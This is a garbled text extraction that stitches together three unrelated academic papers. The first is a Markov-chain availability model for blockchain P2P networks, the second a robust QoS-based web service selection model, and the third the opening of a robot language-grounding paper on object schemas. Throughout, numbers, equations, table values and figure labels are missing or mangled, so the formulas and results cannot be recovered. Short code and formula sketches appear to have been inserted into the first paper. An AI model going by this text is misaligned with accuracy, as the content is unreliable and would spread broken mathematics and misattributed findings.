however the dynamic and changeable of blockchain p p network, the requirement of the availability of block chain network becomes more and more important. from the development trend of p p network, the demand of modeling and verification evaluation on the availability of p p network is more and more common and urgent. the establishment of high availability mailto: @ .com mailto:fuyanfang @aliyun.com mailto:zhongli @sina.com international journal of advanced network, monitoring and controls volume , no. , network is the basis of accurate and timely information exchange, so as to meet the demand of network system to provide high reliable services for various users. consensus consistency inittrans address propagation discovery message communication check nodes seed nodes flooding distributed hash table consensus mechanism—p p network figure . the architecture of p p networks in the blockchain ii. related work the traditional concept of availability is a typical measure of reliability in reliability theory. it is an important parameter in reliability engineering that combines maintainability to represent the effectiveness of the system. "reliability" can only reflect the probability of failure of the network system or components, while "availability" can reflect the quality of the network by considering the repairability of the network. therefore, analyzing the availability of tact network system is an important index to evaluate the design of system networking, system stability and maintenance ability. at present, availability studies mainly focus on the reliability and maintainability of the engineering capability of complex systems, and also on the availability of mission capability. lianhong zhou established the availability model of optical fiber communication system by using the state transfer equation[ ]. hailin feng used markov theory to study the steady-state availability of repairable network system, and analyzed the fuzzy availability of repairable network system and continuous kn(f) network. fenghua xie studied the availability of "n+x" ups system and pointed out that the availability of parallel system was positively correlated with the number of redundant modules[ ]. jingle zhang proposed a workflow availability modeling method based on random petri net and studied and established the spn model of e-commerce system[ ]. jikun yang fused sample data with prior information, used fuzzy variables to deal with the uncertainty of sample data, and proposed a usability analysis method of navigation weapon system based on fuzzy bayes[ ]. above all of these, we can find that the research on the availability of p p network is relatively few and not very mature now. therefore, research available technology based on p p distributed collaborative network under different environmental conditions, analyze the unified modeling and expression of information, build a new generation of block chain network usability evaluation model, improve the information interaction and collaboration ability of block chain platform, and ensure the performance of system service and the formation of stable and reliable operation ability through availability technology. iii. distributed p p network structure basedon block chain block chain technology is the first kind that can be globally distributed deployment of consensus agreement. block chain system achieves efficient consensus through simple unauthenticated broadcast channel and block chain length competition mechanism. 
the typical blockchain system consists of network layer, consensus layer, data layer, intelligent contract layer and application layer[ ]. the network layer is usually based on p p protocol for communication between nodes; the consensus layer implements the consensus protocol, which can be freely selected according to the actual scenario, such as pow based on workload proof, and pos based on equity proof; the data layer is the data structure of the block chain, whose structural design is usually closely coupled with the application scenario according to the actual needs, each computing node is responsible for maintaining its own storage system; the intelligent international journal of advanced network, monitoring and controls volume , no. , contract layer can perform different operations for different data input, this process is automatically executed based on the code, and consensus is reached across the network; the application layer is the basic business of the block chain system, such as financial services and data traceability, etc. there is no central node in the block chain network based p p, and any two nodes can be directly traded, each node is free to join and exit at any time. therefore, the block chain platform usually chooses the p p protocol which is completely distributed and can tolerate single point of failure as the network transmission protocol. block chain network nodes have the characteristics of equality, autonomy and distribution, presenting a flat topology without any centralized authority nodes or hierarchical structure (as shown in figure ). each node has such functions as route discovery, broadcast transaction, and broadcast block and find new nodes[ ]. in the blockchain network, the p p protocol of the blockchain network is mainly used for the transfer of transaction data and block data between nodes. the node listens to the data broadcast in the network all the time. it can only be processed after by verifying the validity of these transactions and blocks when receives new transactions and new blocks sent by the neighbor node. c c c c c c figure . p p network topology iv. availability definition reliability is defined as the ability of a product to perform specified functions under specified conditions and within specified time periods. the higher the reliability, the lower the failure rate of the product. the simplest expression for reliability can be expressed as an exponential distribution, which expresses random failure. ( ) where, t is mission time, is failure rate. availability is defined as the ability to be in a state of executable function under specified conditions and at specified times or time intervals, provided that the required external resources are guaranteed. it is the comprehensive reflection of product reliability, maintainability and maintenance guarantee. the formula is as follows: ( ) mtbf(mean time between failure)refers to the average working time between two adjacent failures and is a reliability indicator of a product. mttr(mean time to repair)describes the average repair time when a product changes from a failure state to a working state. in engineering, mttr is a measure of the maintainability of a product, which is common in maintenance contracts and is used as a measure of service charges. according to the above analysis, "reliability" only reflects the probability of failure of the network system or components, while "availability" considers the repairability of the network and better reflects the quality of the network. 
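the reliability and availability expressions referenced in the passage above are garbled in this copy; based on the surrounding definitions (t is the mission time, λ the failure rate, and availability is defined through mtbf and mttr), their standard forms would plausibly read:

```latex
% plausible reconstruction of the two garbled expressions,
% using only the definitions given in the surrounding text
R(t) = e^{-\lambda t}
\qquad\text{and}\qquad
A = \frac{\mathrm{MTBF}}{\mathrm{MTBF} + \mathrm{MTTR}}
```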
steady-state availability and instantaneous availability are two characteristic quantities that reflect availability. therefore, analyzing the steady state availability and instantaneous availability of blockchain p p network system is an international journal of advanced network, monitoring and controls volume , no. , important index to evaluate the design of system networking, system stability and maintenance ability. v. markovavailability modeling p p network system is a complex system, its nodes states are changing at anytime, while the factors causing the change of the state of nodes mainly include hardware and software errors, human errors, natural disasters, malicious attacked, causing serious consequences to the network system, and even causing the entire network paralysis. the probability of occurrence of the first several factors is relatively small, while as an artificial means, the probability of occurrence of malicious attack is very high in the real war environment. a. markov chain model of the system in this paper, the p p network system targeted is a multi-state markov repairable system, assuming that its failures are caused by malicious attacks. the system is composed of several network nodes and several repair equipment. the life distribution of each node is , and the repair time after node failure is .all of these random variables are independent of each other, and after the fault node is repaired, its life will be the same as the new node. multi-state means that the nodes of the network system are damaged by attack, which may break one, two or more nodes; the number of fault nodes is different means the system state is different. in the process of system design, it is usually necessary to chose availability model to describe the availability of the system. the availability model adopted in this paper is the voting system model of take k in n. there are two types of voting system models of take k in n: one is a system of take k good nodes in n, which requires k or more of the n nodes of the system to be normal in order for the system to work normally, which is denoted as k/n[g]. the other kind is the system of take k bad nodes in n, which means that the system cannot work properly if k or more of the n nodes of the system fail, which is denoted as k/n[f][ ].this paper chose the second system model. when the fault nodes are less than k, the system works normally and repairs the fault nodes. when there are k node failures, the system will fail. at this time, the remaining normal working nodes will also stop working and will not fail. the system will work again until one node under repair is repaired and there are less than k nodes under repair. the system studied in this paper simplifies the actual situation, the n nodes of the system are considered to be one type of node. for example, because the importance of each node is different in practice, the life distribution and repair time of the node may be different, so the node types are not all the same. another example is that when a node fails, its workload must be borne by other nodes, thus accelerating the loss of other nodes. therefore, these idealized conditions are temporarily listed as assumptions, called the basic type for analysis. the number of fault nodes in the system is defined as the state of the system, i.e. 
* + where the working states of the system are * + obviously, the working quality (quality of service) of the different working nodes included in these working states is different, but it is not differentiated in the basic type analysis, and all of them are considered as normal working. x(t)=j indicates that there are j node faults in the system at time t that need to be repaired, i.e. it is in the state of j, where * +. node life and maintenance time obey the exponential distribution, according to the above, can prove to be time continuous multi-state time homogeneous markov chain, state transition probability in △t time is shown in the following formula ( ). represents the probability that the system is in state j at time t. this is the markov model of p p network multi-state repairable system. the state transition probability diagram of the system is shown international journal of advanced network, monitoring and controls volume , no. , in figure : (the state of transition to itself is not shown in the figure)                     t)o(t)(p , )k-(nt)(p k- ,k-n k-n, , ,jt),o(tj-tj)-(nt)(p jj, k-n, , ,jt),o(tjt)(p jj, k-n, , ,jt),o(tj)-(nt)(p jj, kj n       ( ) n-k n-k+ ... nλ t (n- )λ t kλ μ t μ t (n-k+ )μ figure . state transition diagram the state transition probability matrix is represented by a, as follow:                     )k-(n- )k-(n kk-n-k-k-n - )-(n- - )-(n- nn- )()(  ( ) b. steady-state availability of the system steady-state availability is one of the reliability characteristics of markov repairable system, which means the proportion of the whole running time of the network without dismemberment when the network reaches the steady-state, it is the probability of the network being connected. this index is essentially the probability of connectivity at any time in the steady state. according to the properties of homogeneous markov process: ( ) ( ) ( ) according to formula ( ), we get ∑ ( ) where is the probability distribution vector of state in steady state, ( ) , matrix a is substituted into equation ( ), and we get                          ) ( ) ( )) () (()( ) ) (( )) ((      kn kn kn k j j j jjn j jn nn nn n   ( ) the value can be obtained by solving the linear equations, and the steady-state availability of the system is ∑ ( ) c. instantaneous availability of the system instantaneous availability is also one of the reliability characteristics of markov repairable system. for some high-reliability systems like p p networks, it takes a long time to reach their stable state, and the steady-state availability may also be disturbed during the system operation. therefore, it is not enough to calculate the steady-state availability, but to consider the instantaneous index of the system. from the c-k equation, we can obtain that the instantaneous probability is:          ) (,, ) (, ) ( )()(t k rjirij ppp t p s p s p  ( ) the intuitive meaning of the c-k equation is start from state i and arrive at state j after s+ttime, and must first arrive at any state r after s time, and then transfer international journal of advanced network, monitoring and controls volume , no. , from state r to state j after t time. ( ) ( ) ( ) means that has a probability of and the other states have a probability of at the initial moment. 
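a minimal numerical sketch of the steady-state computation outlined above is given below. it assumes one consistent reading of the (partly garbled) transition rates: each working node fails at rate λ, each failed node is repaired at rate μ with ample repair facilities, and no further failures occur once the system is down; the node counts and rates are illustrative, not the paper's.

```python
# Minimal sketch (illustrative parameters): steady-state availability of a
# k-out-of-n:F Markov repairable system. State j is the number of failed
# nodes; the system is up while j < k.
import numpy as np

def generator(n, k, lam, mu):
    """Build the (k+1)x(k+1) infinitesimal generator A of the birth-death chain."""
    A = np.zeros((k + 1, k + 1))
    for j in range(k + 1):
        if j < k:                       # system up: working nodes can still fail
            A[j, j + 1] = (n - j) * lam
        if j > 0:                       # failed nodes under repair
            A[j, j - 1] = j * mu
        A[j, j] = -A[j].sum()
    return A

def steady_state_availability(n, k, lam, mu):
    """Solve pi @ A = 0 with sum(pi) = 1, then sum pi over the working states."""
    A = generator(n, k, lam, mu)
    M = np.vstack([A.T, np.ones(k + 1)])   # append the normalisation equation
    b = np.zeros(k + 2)
    b[-1] = 1.0
    pi, *_ = np.linalg.lstsq(M, b, rcond=None)
    return pi[:k].sum(), pi

if __name__ == "__main__":
    avail, pi = steady_state_availability(n=7, k=4, lam=1 / 1000, mu=1 / 10)
    print("state probabilities:", np.round(pi, 6))
    print("steady-state availability:", round(avail, 6))
```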
equation ( ) is expressed as a matrix differential equation in the following form: { ( ) ( ) ( ) ( ) ( ) = ( ) ( ) ( ) represents the distributed probability of the system in various states at time t, is the row vector, and is also a one-dimensional matrix. ( ) represents the derivative matrix of instantaneous probability of the system at time t this is a system of first order linear differential equations, the general form of its solution is: ( ) ( ) ( ) ∑ ( ) since p and a are matrices, it is difficult to find the analytic expression of the above equation, we can use the laplace transform to find a simpler expression, and let ∗𝑗(𝑠) ∫ 𝑗( ) 𝑠 𝑑 𝑠 , the laplace transform of formula ( ) simplifies to ∗(𝑠) ∫ 𝑗( ) 𝑠 𝑑 ( )( ) 𝑠 ( ) where i is the identity matrix, ( ) can be obtained by inverting transform ∗( ) , then the instantaneous availability of the system is ( ) ∑ 𝑗( )𝑗 ( ) however, it is difficult to obtain analytic expressions by ∗( ) inverse transformation. results can be obtained by means of calculation tools, such as matlab, maple and other scientific calculation software. vi. examples validate take figure as an example, the number of network nodes is , and the minimum number of network nodes that can work normally is , that is / [f] voting system. according to equation ( ), steady-state availability i π of each state is obtained, and then according to equation ( ), steady-state availability a of the network system is obtained. table is for steady-state availability of each states and the system when μ= . hours and λ = hours, table is for steady-state availability of each states and the system when μ= . hours and λ = hours, and table is for steady-state availability of each states and the system when μ= hours and λ = hours. table i. steady-state availability calculation results steady-state availability .  .  .  . a . table ii. steady-state availability calculation results steady-state availability .  .  .  . a .   international journal of advanced network, monitoring and controls volume , no. , table iii. steady-state availability calculation results steady-state availability .  . π .  . a . as can be seen from table , and , as can be seen from table , and , the probability of is the largest, and the probability of and are very small, even negligible. table is the steady-state availability of a different μ and lambda system. figure is the curve trend diagram of table , a more intuitive reflection of how steady-state availability varies with μ and λ table iv. steady-state availability calculation resultsof the system . . . . . . . . . . . . . . . figure . steady-state availability trend diagram in table , the upper parameter is the node average failure parameter λ, the left parameter is μ. the x-coordinate of figure is the average node failure parameter λ, the y-coordinate is steady-state availability, and the four different curves are the average node repair time μ. as can be seen from table and figure , under the markov model, the steady-state availability of the system is very high, close to . the larger the λ, the smaller the μ, the more stable the system can be, which is consistent with the changing rules of p p networks. according to the analysis of . , p p network availability cannot be fully reflected by calculating steady-state availability. therefore, we also need to calculate the instantaneous availability of the system, and calculate the instantaneous availability of the system according to equations ( ) and ( ) with the parameters used in table . 
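instead of inverting the laplace transform analytically, the instantaneous state distribution can be evaluated numerically from p(t) = p(0)e^{at}; the sketch below does this with a matrix exponential under the same illustrative assumptions as the previous sketch.

```python
# Minimal sketch: instantaneous availability A(t) = sum of p_j(t) over the
# working states j < k, computed numerically as P(t) = P(0) * expm(A t)
# rather than by inverse Laplace transform. Parameters are illustrative.
import numpy as np
from scipy.linalg import expm

def generator(n, k, lam, mu):
    """Generator of the k-out-of-n:F repairable chain (same assumptions as before)."""
    A = np.zeros((k + 1, k + 1))
    for j in range(k + 1):
        if j < k:
            A[j, j + 1] = (n - j) * lam
        if j > 0:
            A[j, j - 1] = j * mu
        A[j, j] = -A[j].sum()
    return A

def instantaneous_availability(A, k, times):
    """Return A(t) for each t, starting from state 0 (all nodes working)."""
    p0 = np.zeros(A.shape[0])
    p0[0] = 1.0
    return [(p0 @ expm(A * t))[:k].sum() for t in times]

if __name__ == "__main__":
    A = generator(n=7, k=4, lam=1 / 1000, mu=1 / 10)   # illustrative rates
    times = [0.0, 10.0, 100.0, 1000.0]
    for t, a in zip(times, instantaneous_availability(A, 4, times)):
        print(f"t = {t:7.1f} h   A(t) = {a:.6f}")
```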
the results are shown in the following figure . in figure , the horizontal axis is time and the vertical axis is instantaneous availability. since k= , there are four curves in the instantaneous curves of multiple states, corresponding to and respectively. in order to make the graph more intuitive to reflect the change of the curve, the graph is divided into two parts, the left one are , and , with the vertical coordinate of to . , and the right one is , with the vertical coordinate of . to . when four nodes fail, the entire network system is down and the network is unavailable. from the figure, we can see that i.e. the zero nodes that are damaged gradually decrease from probability , and become stable after reaching a certain time point. the instantaneous availability of is very high, which is close to indefinitely. while the instantaneous availability of other states is relatively small, gradually increases with time until it becomes stable, while the instantaneous availability of and are very small, approaching infinitely. it can be seen that the probability of system failure is very  international journal of advanced network, monitoring and controls volume , no. , small. figure . instantaneous availability graphs of multiple states vii. conclusion for p p networks, the discrete time markov chain method is used to establish a model of state transition in p p networks in this paper, and the repairability of network nodes is considered. the calculation formulas of steady-state availability and instantaneous availability are given by using the model, and the results of the above calculation are obtained. the results are compared with the changing rules of the network system, which conforms to the availability requirements of the p p network. it shows that this model has certain reference value in the availability test of tactical p p network. references [ ] lianhong zhou. availability of fiber optic systems[j].tsinghua univ (sci& tech). . [ ] fenghua xie. modular ups reliability calculation and analysis[j].fuzzy systems & mathematics, . [ ] jingle zhang. availability analysis of flexible workflow based on stochastic petri net[j].computer engineering. . [ ] jikun yang. reliability and availability analysis of missile weapon system based on fuzzy bayesian theory[j]. journal of naval aeronautical and astronautical. [ ] qifeng shao. block chain: architecture and research progress[j].chinese journal of computers. , ( ): - [ ] antonopoulos a m. mastering bitcoin : unlocking digital cryptocurrencies[m].california:o’reilly media, : - . [ ] yongnian wang. reliability evaluation of k/n[g] system availability analysis of flexible workflow based on stochastic petri net. reliability analysis. : - [ ] geng yan. markov modeling method for availability of twoitem system under passivation[j].chinese journal of scientific instrument . : - [ ] yinan jiang. the method of network reliability and availability simulation based on monte carlo[j]. icqr mse. : - [ ] patrick wüchner. queueing networks & markov chains[m].wiley-interscience. : - [ ] du haidong. simulation assessment of degradation system reliability under imperfect maintenance[j]. journal of system simulation. , ( ): - [ ] ivanovitch, silva, luiz affonso, guedes, paulo, portugal, et al. reliability and availability evaluation of wireless sensor networks for industrial applications[j]. sensors, , ( ): - . [ ] datta a. an overview of codes tailor-made for better repairability in networked distributed storage systems[j]. acmsigact news, , ( ): - . 
[ ] yuan yong. blockchain: the state of the art and future trends [j]. acta automatica sinica, , ( ): - [ ] wenli zhou. survey of p p technologies [j]. computer engineering and design, , ( ): - [ ] xuelong wang, jing zhang, et al. survey on peer-to-peer key technologies [j]. application research of computers, , ( ): - . international conference on sensor network and computer engineering (icsnce ) research on robust model for web service selection wei yanxi a*, yu fan b, ma xing, yu haige, yang wenhui school of computer science and engineering, xi'an technological university, xi'an, , shaanxi, china e-mail: b @qq.com, a @qq.com *the corresponding author abstract—most existing service quality models use predefined, deterministic quality of service (qos) parameters for service selection. since many uncertainties exist, the runtime qos of composite services obtained through models and methods based on deterministic qos can degrade, even beyond the range acceptable to users. web services can solve this problem and have become the most reasonable solution in the current application environment; however, in actual service delivery, uncertain factors are the key reason a service composition fails to meet its requirements. to address these problems, this paper first proposes a local optimal selection model based on uncertain qos; web service selection based on uncertain qos has been progressing in recent years. second, redundant services are removed in order to reduce the time spent on selection. the experimental results on the data set show that the proposed model and method can effectively select more robust services for users. keywords-web service; quality of service; robust model i. introduction the service-oriented model has three parts: the service provider, the service client, and the aggregator produced by composing implemented services. the service provider typically supplies not only the implementation of services but also support for the related technologies. the service client is the terminal organization that actually uses the application service; in practice, it is the user. individual services can be integrated into a new composite service that achieves larger goals; this is usually called a business process. services must remain technically neutral and should follow internationally recognized standards as far as possible, and calling a service must use standardized techniques. this article focuses on an in-depth discussion of the characteristics of web services. a web service is a self-describing, self-contained software module that can be used over a network. such a module can not only complete tasks and solve problems but can also act on behalf of users and application programs to handle transactions. by this definition, the main role of currently known web services is to establish an application-oriented distributed computing infrastructure. such a distributed infrastructure consists of many different application modules that interact with each other, communicating over local or public networks to form a virtual logical system.
in current research at home and abroad, qos-based web service selection algorithms mainly include exhaustive, greedy, genetic, particle swarm optimization, and ant colony optimization algorithms. this article instead uses a robust, qos-aware, reliable web service composition approach designed with robust optimization. this paper mainly studies how to ensure that service compositions remain robust under uncertain conditions, thus avoiding re-planning of the composed services to some extent, and describes in detail how the robust optimization method is applied to a service selection model based on uncertain qos. ii. web services discussion and robust optimization a. web service features web services are a distributed computing technology based on xml and internet technologies. platform-independent, loosely coupled, self-contained, programmable web-based applications that can use open xml standards to describe, publish, discover, coordinate, and configure interoperable applications: all of this is part of the full definition of web services. the basic architecture of web services consists of participants (such as the service provider and the service broker) and basic operations (such as find), as shown in figure . figure . the basic architecture of web services the composition strategy of web services provides a global information infrastructure for the development of internet technology. this continuously expanding infrastructure forms a resource-rich computing platform and an information foundation for human society. therefore, a single atomic web service can no longer satisfy the diversified and personalized needs of users, and existing web services have become the most effective and direct resources for solving the problems currently encountered. from the perspective of their properties, web services are loosely coupled and highly integrable; these two features make web service composition possible.
robust optimization overview robust optimization has a wide range of application bases, and most of the studies on traditional optimization problems are deterministic. establish a rationalized model in the process to ensure that it is essential for every aspect of the entire web service process. the goal of robust optimization is to find a solution that can handle all possible uncertain data. the robust optimization proposed by soyster is to consider the "worst case" when the disturbance is maximum, that is, to consider the most unfavorable situation, transform the uncertainty plan into a deterministic corresponding model, and obtain a robust optimal solution by solving the deterministic correspondence model. since this model only considers the worst case, the result obtained is too "conservative", which means that this result is only a better solution for the possible realization of all uncertain data. the later research focuses on how to keep the solution optimal while maintaining the optimality of the solution. at the end of the last century, ben-tal and nemirovski gave the robust equality problem of converting the linear programming to the secondary cone programming under the "ellipsoidal" uncertain set. however, after the conversion, the problem is more complicated and difficult to calculate. in , bertsimas and sim proposed a new robust model and obtained the solution considering both optimality and robustness. at the same time, the probability of the solution violated the constraint was analyzed. then the uncertain discrete problem was studied to solve the network flow problem. a discrete robust model is given for the object. based on the above two theoretical methods, domestic scholars apply robust optimization to supply chain planning, network flow, and logistics planning. generally, in the service selection process based on qos determination, it is often necessary to aggregate different qos attribute values of the same service as the value for calculating or comparing the same service, or to determine the same attribute of different services according to the determined combined service workflow. the aggregate becomes a global property value. however, in the case of uncertain qos, because the description methods of qos attributes themselves are not the same, there are differences in the description of the uncertainty of different qos, it is difficult to use different methods of the same service to determine the value of different attributes of the same service. get together. for example, suppose that the response time fluctuation range is [rt , rt ] and the throughput fluctuation range is [tp , tp ]. the smaller one is, the better, and the bigger the other is, the better is the different types, the units are different, and the numerical quantities are different. it is difficult to aggregate two attributes with uncertainty in a way that determines the model using - normalization combined with a weighted sum. at the same time, because of the uncertainty of qos, it is difficult to obtain the uncertainty of the global qos in the solution process according to the superposition (such as response time superposition) or continuous multiplication (such as reliability multiplication) without affecting the solution result. therefore, this article will establish local optimization service selection model for a single qos attribute. assume that there are n tasks in the workflow of a composite service, and there are a large number of web services in each task. 
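before returning to that setup, the flavour of a worst-case (robust) local choice over a single uncertain attribute can be illustrated with the following sketch; the candidate list, interval values, and function names are hypothetical, and the sketch shows only the conservative min-max idea rather than the model developed in this paper.

```python
# Illustrative sketch only (not the paper's model): local selection of one
# candidate service per task using a single uncertain QoS attribute given as
# an interval [best_case, worst_case] response time. A robust choice ranks
# candidates by their worst case; an optimistic choice would use the best case.
from dataclasses import dataclass

@dataclass
class Candidate:
    name: str
    rt_low: float    # best-case response time (ms)
    rt_high: float   # worst-case response time (ms)

def robust_select(candidates):
    """Pick the candidate whose worst-case response time is smallest (min-max)."""
    return min(candidates, key=lambda c: c.rt_high)

if __name__ == "__main__":
    task_candidates = [
        Candidate("s1", rt_low=40, rt_high=180),
        Candidate("s2", rt_low=60, rt_high=90),
        Candidate("s3", rt_low=30, rt_high=250),
    ]
    print("robust choice:", robust_select(task_candidates).name)      # -> s2
    print("optimistic choice:",
          min(task_candidates, key=lambda c: c.rt_low).name)          # -> s3
```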
these services can complete the task and they have different functional attributes. this article discusses the service selection under the local optimal strategy. we mention that the local optimal strategy is to select individual service classes and examine the candidate atomic service sets of each abstract service class. workflows have control structures such as sequence, selection, loop, and parallel. without losing the generality, it is assumed that a sequential process with tasks is used as the combined service process international conference on sensor network and computer engineering (icsnce ) model in this paper, and service selection is performed for the first task in the process. iii. experiments a. experiment analysis the environment used in this experiment was tensorflow-gpu . . open source software library, windows in order to verify the effectiveness of the proposed method, a prototype system of web service test and selection management was developed in the early stage of the research. in the past, researchers usually used solving data to determine the model, using data to measure the service qos alone, or randomly generating some values within a range for simulation. in this paper, researches and calculations are conducted on uncertain data. uncertainty in the use of the service description cannot be confirmed by a single test or a randomly generated value. the minimum response time of the service call can reflect the level of its optimality; the maximum response time reflects the level of robustness; the expectation reflects the average response value of the response time; the variance mainly reflects the response time of each call. the deviation from the expected response time of the service, that is, the smaller the variance, the smaller the response time of service invocation and the more stable. b. experiment datasets adjust the value of  . in the experiment, since  can only take values between [ , ], six values of   , . , . , . , . ,  are chosen for solving. the specific results are shown in table . table i. solving the result t values . . . . . . service number z*(t) . . . . . . . . iv. conclusion this paper presents the application of robust optimization method in the selection of web services based on uncertain qos. on the basis of determining the qos-based web service selection method, considering the uncertainty of qos, a single uncertain qos service selection model based on the local optimal strategy is established. after the redundant service is removed, the robust optimization of the uncertain processing problem is used. the method converts and solves the service selection model based on uncertain qos and obtains a solution that takes both robustness and optimal solution into account. in the final experiment, the paper verifies the validity of the proposed model and method, and verifies the effect of redundant service culling strategy on the efficiency of the solution. the web service composition based on uncertain qos has the following advantages: first, for software developers, paying attention to personalized web service composition can improve user acceptance, enhance product competitiveness and enhance corporate reputation efficiency. second, for users and users, the importance of personalized web service composition can improve user productivity, reduce training and technology support costs, improve user comfort and satisfaction, and increase investment efficiency and efficiency of system construction. 
third, personalized research under uncertainty will improve the accuracy of service provision, give full play to the potential of every service and the effect of other services cooperation. references [ ] s.bing,c.jiayong .research and application of dynamic web service composition based on qos. - - . [ ] c.ming,s.baoning.research and application of web service composition. - - [ ] x.jei.web service selection algorithm review journal. - - [ ] y.jian,h.yanbo.service-oriented computing--principles . - [ ] l.wei,y.bing,z.defeng.qos-based dynamic service portfolio journal. - - [ ] j.zheyuan,h.jiangbo.dynamic qos-aware web service selection and combination optimization model. - [ ] http://www.ijanmc.org/current.htm.research and implementation for a class of large-scale full-range power system real-time simulator.www.ijanmc.org. [ ] gu wei, wang jihua, zhang yan, gui junguo, and xu meimei. a study and simulation on thermal cycling system of cfb boilerwww.ijanmc.org. [ ] http://www.ijanmc.org/current.htm.fine-grained access control scheme based on cloud storage. http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf http://www.ijanmc.org/ /iccnea - .pdf word template for authors, eias style b object schemas for grounding language in a responsive robot k a i - yu h hsi ao a * , s te f an i e t el le x a , s o ro u sh v o sou g hi a , r o n y k ub a t a , d e b ro y a amit media laboratory, mit, cambridge, massachusetts, usa abstract we introduce an approach for physically-grounded natural language interpretation by robots which reacts appropriately to unanticipated physical changes in the environment and dynamically assimilates new information pertinent to ongoing tasks. at the core of the approach is a model of object schemas that enables a robot to encode beliefs about physical objects in its environment using collections of coupled processes responsible for sensorimotor interaction. these interaction processes run concurrently in order to ensure responsiveness to the environment, while coordinating sensorimotor expectations, action planning, and language use. the model has been implemented on a robot that manipulates objects on a tabletop in response to verbal input. the implementation responds to verbal requests such as “group the green block and the red apple,” while adapting in real-time to unexpected physical collisions and taking opportunistic advantage of any new information it may receive through perceptual and linguistic channels. keywords: object schema; language grounding; human-robot interaction; semantics _____________________ *corresponding author. aemails: {eepness, stefie , soroush, kubat, dkroy}@media.mit.edu mailto:soroush@media.mit.edu mailto:kubat@media.mit.edu object-centred, behaviour-based language grounding natural language is an efficient means by which humans convey beliefs and desires to other people. analogously, a robot system that uses natural language could communicate more efficiently with humans. the conceptual structures required for language use could also help the robot interact with an environment generally designed by humans for human use. 
for a robot with a physical body to make sense of language, the robot's internal representations need to be grounded in the real world, meaning that the robot must have processes that relate its words and concepts to its perceptions and actions in systematic ways. for instance, a language-using robot must identify the perceptual referents of nouns, and it must translate verbs into appropriate motor behaviour. a physical robot, however, also needs to stay responsive to changes in its environment. this is the premise of behaviour-based robot design, as argued by brooks [ ] and numerous others. in this paper we present a model for language grounding that addresses the need for responsiveness without sacrificing the ability to form structured internal representations of a kind necessary to support symbolic communication. at the core of the model are object schemas, in which running processes are organized according to the physical object towards which they are directed, and by which they are causally affected. the object schema processes run concurrently to ensure responsiveness of the robot to its environment. the object schemas built from the processes provide object representations for planning and language use. the model builds upon an underlying theoretical object schema framework developed in [ , ]. to demonstrate the efficacy of these constructs, we have implemented a robotic system in which the object schemas assist the coordination of vision, touch, motor action, planning, and language use, in a tabletop domain. figure shows the robot, trisk, performing a behaviour sequence enabled by the model. in this paper we first situate our approach with respect to related work in the field. then, we explain the model and describe selected aspects of the implementation in greater detail. background our model brings together behaviour-based design and language grounding, combined through a sensorimotor schema representation of objects. in this section we review some related work and highlight some benefits of our model. smpa and non­linguistic behaviour­based robots from the days of shakey (the first language-using robot [ ]) the “traditional” approach for robot planning and control was what brooks eventually called the “sense-model-plan-act” approach (smpa). the idea behind smpa is that sensory input is interpreted as a model of the external world, the model is used for planning purposes, and then the plans are used to guide action. the smpa model naturally supports language use. for example, verbal commands can be translated into plans that are inserted into the plan layer of an smpa system. likewise, verbal descriptions of world state can be translated into elements of the model layer. as an alternative to the smpa approach, brooks [ , ] developed the subsumption architecture, an early example of behaviour-based robot control. behaviour-based approaches focus first and foremost on the responsiveness of the robot to unexpected (and thus unmodelled) changes in the environment. the subsumption architecture maintains responsiveness by decomposing a task into separate behaviours and having a dedicated process handle all aspects of each specific behaviour, from sensory input to motor output. behaviour processes interact through layered control interrupts. brooks identified the use of internal models of the environment as the primary culprit for impeding responsiveness to change, and as a result, argued against explicit internal models altogether. 
this prohibition, however, leaves no clear path for language processing, which is fundamentally a “representation-hungry” task [ ]. later work on behaviour-based robots have introduced some degree of representation and planning by layering these elements on top of reactive processes. for instance, some of the three-layer systems developed to date [ , , , ] allow reactive behaviours (such as collision-avoidance) to compete with more complex planned behaviours (such as mapping and path planning) as part of an action selection process. representations in such systems focus primarily on behaviours and task decomposition. object representation behaviour-based robots have been successfully deployed in a number of real world systems, demonstrating how much can be accomplished with a minimum of representation. however, the raw sensorimotor processing of the subsumption architecture and the action representations of the later systems have limitations with respect to human communication and acting in human-centric environments. adding representations of physical objects is important for several reasons: communicating about objects human language use is full of statements about objects, suggesting that explicitly representing objects will enable the robot to efficiently handle such language. planning actions representing objects would allow a robot to plan coherent sequences of actions towards goals expressed in terms of objects and their states. coordinating expectations the conception of objects and object permanence may provide an efficient means for a robot to generate structured predictions of incoming sensory input, and to predict changes in the environment as a result of specific actions taken by the robot. because of the importance of objects in communication and planning, our object schema model organizes processes according to the object they target. there are several other systems that explicitly represent physical objects. here we relate them to our approach: object persistence and tracking several projects inspired by behaviour-based design, such as those led by blumberg et al. [ , ] and later breazeal et al. [ , ] remain reactive while updating object representations continuously. however, in these models much of the object processing is decoupled from the object representations themselves, making it inconvenient to represent object-directed affordances (i.e., actions that can be taken and states that can be achieved by the agent, due to the object [ ]) such as “liftable” and “graspable.” because the processes that target an object are contained within our object schemas, affordance information can be stored alongside the corresponding processes in our object representation. this simplifies the grounding of affordance-related words. affordance learning several systems do represent object affordances explicitly, for instance for learning affordances [ , , , ]. learning is a vital future direction for our work as well, but our current emphasis is on developing a richer affordance-centred representation of objects that can support language use and responsive behaviour. the model that is presented in this paper is influenced by the piagetian idea of a sensorimotor schema [ ]. both arbib [ ] and drescher [ ] have developed computational interpretations of piaget's concept of schemas. drescher's schema mechanism is an early attempt to fully implement schemas and test them in a simulated world. 
